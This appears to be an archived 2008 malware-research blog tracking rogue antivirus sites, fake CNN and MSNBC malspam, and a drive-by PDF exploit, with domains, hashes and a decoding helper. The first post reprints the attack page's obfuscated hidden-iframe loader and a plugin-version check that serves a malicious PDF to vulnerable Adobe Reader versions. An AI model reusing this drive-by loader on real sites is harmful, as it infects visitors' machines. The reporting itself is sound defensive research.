Archive for the 'Antivirus 2008' Category

31 Aug

Adobe Acrobat Reader PDF Exploit (gnu.pdf & us.pdf) (UPDATED)

This morning we found a website that automatically loads an infected PDF file.

When the user is directed to the infected site, a hidden iframe loads the PDF file. Here is what happens.

Links still live, proceed at your own risk.

The user visits hxxp://120.50.46.90/~admin/tps/index.php and the following obfuscated code is included in the page:

<script language="javascript">document.write(unescape('%3C%69%66%72
%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%36%39%2E
%34%36%2E%32%37%2E%34%31%2F%61%66%78%76%2F%74%70%76%2F%69
%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68
%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%69
%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74
%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%22%3E%3C%2F%69%66
%72%61%6D%65%3E'));</script>

When deobfuscated:

<iframe src="http://69.46.27.41/afxv/tpv/index.php" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

The hidden iframe above loads a page that includes the following code:

<script>
ppdf=0;
i=0;
// Walk the installed browser plugins, pulling version numbers out of
// the Adobe Reader and Shockwave Flash plugin description strings
for(;navigator.plugins[i];i++)
{
  re=/.d.{2}e.A.{2}o.....l..-.+?([0-9]+.[0-9]+)/;
  if(res=re.exec(navigator.plugins[i].description))
  {
    ppdf=res[1];
  }
  var re=/.h.{5}v.+?s.\s([0-9])\S([0-9]).+?([0-9]{1,5})/;
  var res;
  if(res=re.exec(navigator.plugins[i].description))
  {
    flash=res[1]+'.'+res[2]+'.'+res[3];
  }
}
ppdfenable=0;
if(ppdf!=0)
{
  ppdfenable=0;
  // Strip the dots ("8.1.2" becomes "812") and gate on the leading digits:
  // only Reader 7.0.x, or anything below 7, is served the PDF
  ppdf=ppdf.replace(/\D/g,"");
  if(ppdf[0]==7 && ppdf[1]<1)ppdfenable=1;
  if(ppdf[0]<7)ppdfenable=1;
  if(ppdfenable)
  {
    document.write('<iframe width=1 height=1 src="hxxp://69.46.27.41/afxv/tpv/gnu.pdf"></iframe>');
  }
}
</script>

If the Adobe Reader plugin reports a major version below 7, or 7.0.x, the script writes a second hidden iframe that leads to the PDF in question, located at hxxp://69.46.27.41/afxv/tpv/gnu.pdf. Here is additional information regarding this file; it is also available in /pnuemo-malware/.

gnu.pdf
Result: 6/35 (17.15%)
MD5: 213d20a0523b6ea6c93d4348a509c34c
VirusTotal

Update your software!
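An added triage helper, not code from the original post: it decodes the document.write(unescape(...)) loader shown above, flags iframes that are 1x1 or hidden with CSS, and flags the navigator.plugins version-gating pattern of the second stage. The sample page and the host sandbox.invalid are constructed placeholders, not the live addresses from the post.

```python
"""Triage helper for the obfuscated iframe loader pattern.

Added example, not code from the original post: decode the percent-encoded
argument of document.write(unescape('...')), report 1x1 or CSS-hidden
iframes, and flag navigator.plugins version-gating in the second stage.
"""
import re
from urllib.parse import unquote

# Constructed sample in the shape of the loader on the page; the host
# "sandbox.invalid" is a placeholder, not the live address from the post.
SAMPLE_HTML = (
    "<html><body><script language=\"javascript\">document.write(unescape('"
    + "".join("%%%02X" % b for b in
              b'<iframe src="http://sandbox.invalid/afxv/tpv/index.php" width=1 '
              b'height=1 style="visibility:hidden;position:absolute"></iframe>')
    + "'));</script></body></html>"
)

UNESCAPE_RE = re.compile(r"unescape\(\s*['\"]([^'\"]*)['\"]\s*\)")
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SRC_RE = re.compile(r"src\s*=\s*['\"]?([^'\" >]+)", re.IGNORECASE)


def decode_unescape_payloads(html):
    """Return the decoded text of every unescape('...') argument in html."""
    return [unquote(m.group(1)) for m in UNESCAPE_RE.finditer(html)]


def is_hidden_iframe(tag):
    """True if an <iframe> tag is 1x1 or hidden with CSS, as in the post."""
    t = tag.lower()
    tiny = (re.search(r"\bwidth\s*=\s*['\"]?1\b", t)
            and re.search(r"\bheight\s*=\s*['\"]?1\b", t))
    compact = t.replace(" ", "")
    hidden = "visibility:hidden" in compact or "display:none" in compact
    return bool(tiny or hidden)


def find_hidden_iframes(html):
    """Decode obfuscated writes, then collect hidden iframe src values."""
    found = []
    for text in decode_unescape_payloads(html) + [html]:
        for m in IFRAME_RE.finditer(text):
            if is_hidden_iframe(m.group(0)):
                src = SRC_RE.search(m.group(0))
                found.append(src.group(1) if src else "")
    return found


def uses_plugin_gating(html):
    """Flag the second-stage pattern: enumerate navigator.plugins, then
    document.write a frame only for a matching plugin version."""
    return "navigator.plugins" in html and "document.write" in html
```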

UPDATED 9/1 12p PST

us.pdf
Result: 10/36 (27.78%)
MD5: 8175212481f069a6dd54de9cbd044039
VirusTotal
hxxp://174.133.121.165/us.pdf
hxxp://88.85.95.134/us.pdf

25 Aug

Antivirus 2008 Pro XP

We came across a new domain name registered at estdomains today. This site may appear entirely legitimate, as it sports a support page, affiliate page, terms of service, etc. But we can assure you that it is a bad site. Be aware of this site and do not download any of the files associated with it! Site: hxxp://antivirus2008proxp.com

What it looks like:

Antivirus 2008 Pro XP

Removal:

Remove this threat with MalwareBytes!

21 Aug

MS Antivirus 2008 morphed from XP Antivirus 2008

We detected a new XP Antivirus 2008 rogue security software site branded as “MS Antivirus 2008”. The file, MSASetup.exe, comes from hxxp://msantivirusxp.com/install.php and is undetected by most AV vendors at the moment.

MS Antivirus 2008

File: MSASetup.exe
File size: 1037918 bytes
MD5: 1f58d870738aaebb12ed7ece90781c6a
SHA1: d8f030275b571dea6b8836f433e933cc5e6a1834
MDB: /lithium-malware/MSASetup.zip

We also detected other new sites pushing out rogue anti-malware products.

Antivirus 09

Site: http://antivirus-purchasing.com/
Distributes: Antivirus 09
File: None yet

Site: http://antivirusfreescan2009.com/
Distributes: Antivirus 09
File: AV2009Install_.exe
DL Link: hxxp://antivirusfreescan2009.com/2009/download/trial/AV2009Install_*.exe

Removal:

Remove this threat with MalwareBytes!

19 Aug

The International Virus Research Lab Strikes Again!

Here are some new domains pushing out malicious binaries. All of the files have been made available in /lithium-malware/AVXP08_1.zip

Screen shots (image captions): hxxp://supersolution-freeantivirus.com/antivirus, antivirus2, avxp08, powerav09

Site: hxxp://antivirus-bestsolution.net
Distributes: Antivirus XP 2008
Files: Setup.exe
MD5: 0044fd9dbf39280ec10ba88068637e5e
SHA1: d4ae99b5b490047038bf0c8a3277d3a8b42f6be9
SHA256: b7c4c4f8cf54b4fe87571b28915a38d95b05dc6b8d1a36dfaec746de8e697d78

Site: hxxp://antivirus4protection.net/
Distributes: Antivirus XP 2008
Files: Setup.exe
MD5: b6ffa3a1c9e5ea0bd58fd2a38d42e71a
SHA1: a60d2e00d3e35e8213ee3067eb2f3f99871b92b4
SHA256: b33b9e3dd5a662d5e11dc5d5f6df13e2b1afc4be217c3553fb0f3981591c432d

Site: hxxp://antivirusproxp.com
Distributes: Antivirus XP 2008
Files: Setup.exe
MD5: b6ffa3a1c9e5ea0bd58fd2a38d42e71a
SHA1: a60d2e00d3e35e8213ee3067eb2f3f99871b92b4
SHA256: b33b9e3dd5a662d5e11dc5d5f6df13e2b1afc4be217c3553fb0f3981591c432d

Site: hxxp://freebest-antivirus.net/
Distributes: IVRL Defender
Files: Setup.exe
MD5: b6ffa3a1c9e5ea0bd58fd2a38d42e71a
SHA1: a60d2e00d3e35e8213ee3067eb2f3f99871b92b4
SHA256: b33b9e3dd5a662d5e11dc5d5f6df13e2b1afc4be217c3553fb0f3981591c432d

Site: hxxp://goodantivirus-free.net/
Distributes: Antivirus XP 2008
Files: Setup.exe
MD5: b6ffa3a1c9e5ea0bd58fd2a38d42e71a
SHA1: a60d2e00d3e35e8213ee3067eb2f3f99871b92b4
SHA256: b33b9e3dd5a662d5e11dc5d5f6df13e2b1afc4be217c3553fb0f3981591c432d

Site: hxxp://noadwareantivirus.com
Distributes: Antivirus XP 2008
Files: Setup.exe
MD5: 0044fd9dbf39280ec10ba88068637e5e
SHA1: d4ae99b5b490047038bf0c8a3277d3a8b42f6be9
SHA256: b7c4c4f8cf54b4fe87571b28915a38d95b05dc6b8d1a36dfaec746de8e697d78

Site: hxxp://pwrantivirus2009.com/
Distributes: Power Antivirus 2009
Files: Install.exe
MD5: a06b0ec8cecd60abcad508bcbdf467e4
SHA1: dd2999afa470d56a460a3c216c0e34023e0deaa7
SHA256: 6519623940729b4d00c98494c309c60b5b2cad31ad5108c7876bf1e011876ea7

Site: hxxp://scanner-pwrantivirus.com (Russian Federation)
Distributes: None yet
Files: None yet

Site: hxxp://scanner-xpertantivirus.com/ (Russian Federation)
Distributes: None yet
Files: None yet

Site: hxxp://solution-freeantivirus.com/
Distributes: Antivirus XP 2008
Files: Setup.exe
MD5: b6ffa3a1c9e5ea0bd58fd2a38d42e71a
SHA1: a60d2e00d3e35e8213ee3067eb2f3f99871b92b4
SHA256: b33b9e3dd5a662d5e11dc5d5f6df13e2b1afc4be217c3553fb0f3981591c432d

Site: hxxp://supersolution-antivirus.com/
Distributes: IVRL Defender
Files: Install.exe
MD5: b6ffa3a1c9e5ea0bd58fd2a38d42e71a
SHA1: a60d2e00d3e35e8213ee3067eb2f3f99871b92b4
SHA256: b33b9e3dd5a662d5e11dc5d5f6df13e2b1afc4be217c3553fb0f3981591c432d

Site: hxxp://supersolution-freeantivirus.com/
Distributes: Antivirus XP 2008
Files: Setup.exe
MD5: b6ffa3a1c9e5ea0bd58fd2a38d42e71a
SHA1: a60d2e00d3e35e8213ee3067eb2f3f99871b92b4
SHA256: b33b9e3dd5a662d5e11dc5d5f6df13e2b1afc4be217c3553fb0f3981591c432d

18 Aug

“Weekly top news” (new)

In the same vein as the recent fake CNN and MSNBC malspam campaigns, a new one is floating around with the subject line of “Weekly top news”, with the sender’s name “Top News Agency”:

picture-21

The content of the e-mail purports to link to a number of “breaking” news items and “shocking” videos:

picture-1

The infected sites look rather plain (no images from real news sites) with another false video embed and “ActiveX Object Error”:

picture-31

Funny enough, clicking on the “Close this page” button at the top attempts to redirect to hxxp://79.135.167.18/antivirus, but due to a coding error on the part of the bad guys/gals, it looks like they only appended that URL to the existing one, e.g. hxxp://[infected site]/URL=hxxp://79.135.167.18/antivirus, yielding a 404:

picture-41

Now, when attempting to navigate away from the page (or reload, too, of course), the user is presented with another warning dialog, stating that they haven’t finished their virus scan! GASP!

picture-5

The dropper looks to be very similar to the ones we’ve already seen in the fake CNN and MSNBC campaigns, so nothing terribly new here. Two different filenames, scaner.exe [sic] and install.exe. Same tactic to get the user to download the dropper, too (simply direct them to it). Judging by what we’ve seen so far, this one’s going to download “Antivirus XP 2008” again, so nothing new there, either.

SHA256(install.exe)= c5c3c45d488028bb5978cdababde1e90a18ea4ba994ad1eb6205399b04a4faca
SHA256(scaner.exe)= c5c3c45d488028bb5978cdababde1e90a18ea4ba994ad1eb6205399b04a4faca

16 Aug

Database Update and New Malicious Domains

File added to MDB: lithium-malware/IVRL-Antivirus-600457.zip

Taken from: hxxp://antivirus0003.com/download.php

XP Antivirus 2008

  1. Antivirus-XP-2008.exe (18A752131BF9770050613D030DC62125)
    1. Result: 1/35 (2.86%)
  2. Update-August-2008.exe (90DC33CDFAFF72799962F678BA7EB88F)
    1. Result: 10/36 (27.78%)
    2. ThreatExpert

Sites Added:

  • antivirus0003.com
  • antivirus0004.com
  • antivirus0005.com
  • antivirus0006.com
  • antivirus0007.com
  • antivirus0015.com
  • antivirus2009online.com
  • antivirusxp-pro.com
  • antivirusxp2009.com
  • pwrantivirus.com
  • theantivirusscan.com
  • wista-antivirus2009.com
  • xpertantivirus.com

13 Aug

“msnbc.com - BREAKING NEWS” (update)

The content of the infected sites has changed, now accurately imitating MSNBC sites:

picture-4

Additionally, the downloader, adobe_flash.exe, appears to be slightly different, as a new checksum is represented:

SHA256(adobe_flash.exe)= 2fb8a4ecb561475b52883b535ce9810e6021ebe666e16e89cbbc86018d153547

Analysis to come.

13 Aug

“msnbc.com - BREAKING NEWS” (new)

It looks like a campaign has begun, similar to the fake CNN alerts, using MSNBC “Breaking News” notification e-mails:

Updated Subject Lines:

  • msnbc.com - BREAKING NEWS: Time Warner sells AOL
  • msnbc.com - BREAKING NEWS: How to save money on gas
  • msnbc.com - BREAKING NEWS: Americans loves to sue people
  • msnbc.com - BREAKING NEWS: Millions of credic card numbers stolen from bank database, find out if you are affected
  • msnbc.com -BREAKING NEWS: Mary-Kate Olsen implicated in Heath Ledger’s death

picture-2

The hyperlink purporting to be hxxp://breakingnews.msnbc.com actually points to the malicious domain, which hosts what appears to be the same content as the fake CNN campaign:

picture-3

Just like before, the content of the infected site/page is replete with escaped text waiting to be decoded by a document.write(unescape(...)) call down near the bottom. The downloader, adobe_flash.exe, appears to be the same one used in the CNN-oriented campaign. Looks like they’re not changing much.

SHA256(adobe_flash.exe)= a629c6ea28327a467e666a2a7d5a5ccc3194858b2217f608431b98dff268c2d9

05 Aug

Sponsored Result != Safe

We have been monitoring several malware campaigns lately, and we are noticing the distribution spread from spam e-mails alone to social networking sites and now to search engine sponsored results.

A good example is the CNN Top 10 malspam campaign we exposed yesterday. The e-mail comes off as legitimate to the average user and leads to infection.

In a malware-related Google search we entered the search term “CNN Top 10 XP Antivirus” and found a sponsored result for a rogue anti-malware product, Antivirus XP 2008.

Screen shot of the Google search results, including the sponsored result “Free online check! New Generation.”

If we click the link we are taken to a rogue anti-malware site, hxxp://antivirus-xp-2008.net. *Warning* Live malicious site! Proceed at your own risk!* It appears legit, offers a free scan, and even sports badges from PC Magazine, Sun, Microsoft, Intel, ICSA, Checkmark, and VB100 to keep it looking like a credible site.

XP Antivirus

If we download the files we get a zip file with 2 files. The files are pretty much undetected across the board because they are so new. We have included the JoeBox Sandbox reports for you to look at.

Zip Contents

Antivirus-XP-2008.exe
-> VirusTotal: Result: 6/36 (16.67%) CDFAE03CA18BBAF307A77F9BA2BB7B38
-> JoeBox Sandbox: JoeBox Sandbox Report

Update-July-2008.exe
-> VirusTotal: Result: 3/36 (8.34%) 2E3D63ED9BFF383926FBD34449513928
-> JoeBox Sandbox: JoeBox Sandbox Report

*UPDATED 8:35pm*

Found more sponsored links by simply searching “antivirus software” on Google. Same exact setup on a different domain name hxxp://2008antivirusxp.com.

avxp2k8ad

More results on other search engines (click image for Virustotal results)…

adwaredlad

*UPDATED 8-06-08*

Another sponsored link was found for rogue antivirus software on a different domain, hxxp://xp-2008.com. This was found by searching ‘antivirus’. This has the potential to mislead many people, because anyone searching for ‘norton antivirus’, ‘mcafee antivirus’, ‘panda antivirus’, or any other REAL software will also be presented with this advertisement.

xpav2k8ad

04 Aug

Malspam CNN E-mail points to get_flash_update.exe malware.

We came across a malspam e-mail today that looks like an authentic CNN Top 10 e-mail blast. The e-mail arrives in HTML format and covers the daily top 10 news items.

Update: We have found several other domains serving the same malware with different hashes.

*warning* These are live malicious sites. Proceed at your own risk!


CNN E-mail

Some of the titles include:

Corrupt China official betrayed by leaky toilet
Olympic Sport: Blocking the Internet
Boy Loses Arm in Gator Attack
Guinea Pigs Get Dressed … and Eaten
Angry, late, tired passengers make computers crash
Don’t streak, get drunk or sleep outside at Olympics
Paris Hilton’s mom takes offense at McCain’s humor
Cheesus! Jesus Spotted in a Cheeto
It’s a buyer’s market if you know what ‘code words’ to look for.
Cheesus! Jesus Spotted in a Cheeto
Half-scale replica of German tank built for paintball competition.
Dog Plays Mom for Tiger Cubs
6 Police Die in Pre-Olympic Attack
Illusionist Chris Angel races against time in a building set to detonate.
Drunken Man Can’t Erase Arrest
Social networking sites have lots of users, but no one seems to be buying.
Bush urgently flies to Asia
Furnished Nazi bunkers surface in Denmark
6 NFL greats inducted into the pro football hall of fame

When we click on the link it points us to hxxp://yooia97.com/news/ which is a page designed to get us to download the get_flash_update.exe malicious “codec”.

CNN Malspam site

Additional information
File size: 78848 bytes
MD5: 1fe971d98216e26b0817451943af270b
SHA1: 882fda149f33451fa5ba9abc73db72f50f71cbbe
SHA256: 2cb4320aa298fe330faf5d54c05d224c7dbd28a921ce452fa4c19497c1125d7f
SHA512: b5aea389775f9566a896e9510ad761fc05f00cfeb2694d2c35331f83d915437897bc06888ad6f5ad405a316e568561c9a457004be300c8c67fbbc56d57892609
PEiD: -
PEInfo: PE Structure information

( base data )
entrypointaddress: 0x409f66
timedatestamp: 0x487d1ddb (Tue Jul 15 21:59:55 2008)
machinetype: 0x14c (I386)

( 3 sections )
name    viradd   virsiz  rawdsiz  ntrpy  md5
.text   0x1000   0xdf4d  0xc200   8.00   dcf98a98a287684df152670d3c406344
.rdata  0xf000   0x36dc  0x2200   7.98   f45a3f588bfbffda48509cf3caa4c860
.data   0x13000  0x6000  0x4000   4.86   6325a094a4e4462c96bbaab6919ae28d

( 3 imports )
> WININET.DLL: GopherFindFirstFileA, GopherOpenFileW, FtpGetFileW, FreeUrlCacheSpaceA, HttpQueryInfoA
> USER32.DLL: DrawIcon, DestroyCaret, FillRect, GetActiveWindow, GetMonitorInfoW, GetShellWindow
> ADVAPI32.DLL: ReportEventW, RegFlushKey, DecryptFileW, ReadEventLogW, OpenThreadToken

( 0 exports )

ThreatExpert info: http://www.threatexpert.com/report.aspx?md5=1fe971d98216e26b0817451943af270b
Prevx info: http://info.prevx.com/aboutprogramtext.asp?PX5=290F32F1001BC75F34CC01D334F83300C0FDDB47




